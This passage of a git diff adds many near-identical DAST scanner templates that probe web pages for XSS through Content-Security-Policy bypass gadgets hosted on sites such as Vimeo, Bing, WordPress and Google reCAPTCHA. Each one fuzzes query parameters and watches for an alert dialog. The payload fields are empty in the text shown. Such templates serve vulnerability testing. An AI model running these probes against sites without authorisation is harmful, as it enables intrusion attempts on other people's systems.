+ tags: xss,csp-bypass,alibaba
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ug_alibaba_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ug_alibaba_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml
new file mode 100644
index 00000000000..2f34a9f6cfb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: uk-indeed-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Indeed UK
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,indeed
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: uk_indeed_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "uk_indeed_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml
new file mode 100644
index 00000000000..740cc8c9b1a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ulogin-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ULogin
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ulogin
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ulogin_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ulogin_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml
new file mode 100644
index 00000000000..b19d7d86e78
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: unpkg-angular-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Unpkg Angular
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,unpkg
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: unpkg_angular_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "unpkg_angular_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml
new file mode 100644
index 00000000000..af132775dcf
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: unpkg-hyperscript-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Unpkg Hyperscript
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,unpkg
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: unpkg_hyperscript_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "unpkg_hyperscript_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml
new file mode 100644
index 00000000000..c559750d741
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: urs-pbs-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via PBS URS
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pbs
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: urs_pbs_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "urs_pbs_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml
new file mode 100644
index 00000000000..cc9de711696
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: vimeo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Vimeo
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,vimeo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: vimeo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "vimeo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml
new file mode 100644
index 00000000000..3b61cc1b908
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: visitor-pixplug-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Pixplug Visitor
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pixplug
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: visitor_pixplug_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "visitor_pixplug_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml
new file mode 100644
index 00000000000..19002ae5e5e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: visitor-service-tealiumiq-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via TealiumIQ Visitor Service
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,tealiumiq
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: visitor_service_tealiumiq_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "visitor_service_tealiumiq_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml
new file mode 100644
index 00000000000..55629180057
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: vk-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via VK API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,vk
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: vk_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "vk_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml
new file mode 100644
index 00000000000..cb01bd49eb5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wb-amap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Amap WB
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,amap
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wb_amap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wb_amap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml
new file mode 100644
index 00000000000..cdfc3627cf1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: widget-usersnap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Usersnap Widget
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,usersnap
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: widget_usersnap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "widget_usersnap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml
new file mode 100644
index 00000000000..7be61d69a52
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: widgets-pinterest-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Pinterest Widgets
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pinterest
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: widgets_pinterest_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "widgets_pinterest_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml
new file mode 100644
index 00000000000..76d58cfbfa0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wikipedia-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Wikipedia API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wikipedia
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wikipedia_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wikipedia_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml
new file mode 100644
index 00000000000..3ee7807ea53
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wordpress-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via WordPress API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wordpress
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wordpress_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wordpress_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml
new file mode 100644
index 00000000000..7c030ec3b51
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wordpress-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via WordPress API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wordpress
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wordpress_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wordpress_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml
new file mode 100644
index 00000000000..0333978a2a0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wse-api-here-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via HERE API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,here
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: wse_api_here_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "wse_api_here_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml
new file mode 100644
index 00000000000..900a228c344
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-ancestrycdn-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Ancestry CDN
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ancestrycdn
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_ancestrycdn_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_ancestrycdn_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml
new file mode 100644
index 00000000000..c2fd0c94538
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-api-ibm-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IBM API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ibm
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_api_ibm_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_api_ibm_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml
new file mode 100644
index 00000000000..7e27eecdcee
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-bing-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Bing API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,bing
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_bing_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_bing_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml
new file mode 100644
index 00000000000..5411b007ad8
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-blogger-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Blogger API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,blogger
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_blogger_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_blogger_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..7b735dabe0e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-analytics-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Analytics
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google-analytics
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_google_analytics_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_google_analytics_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..1e1c2f12c4b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
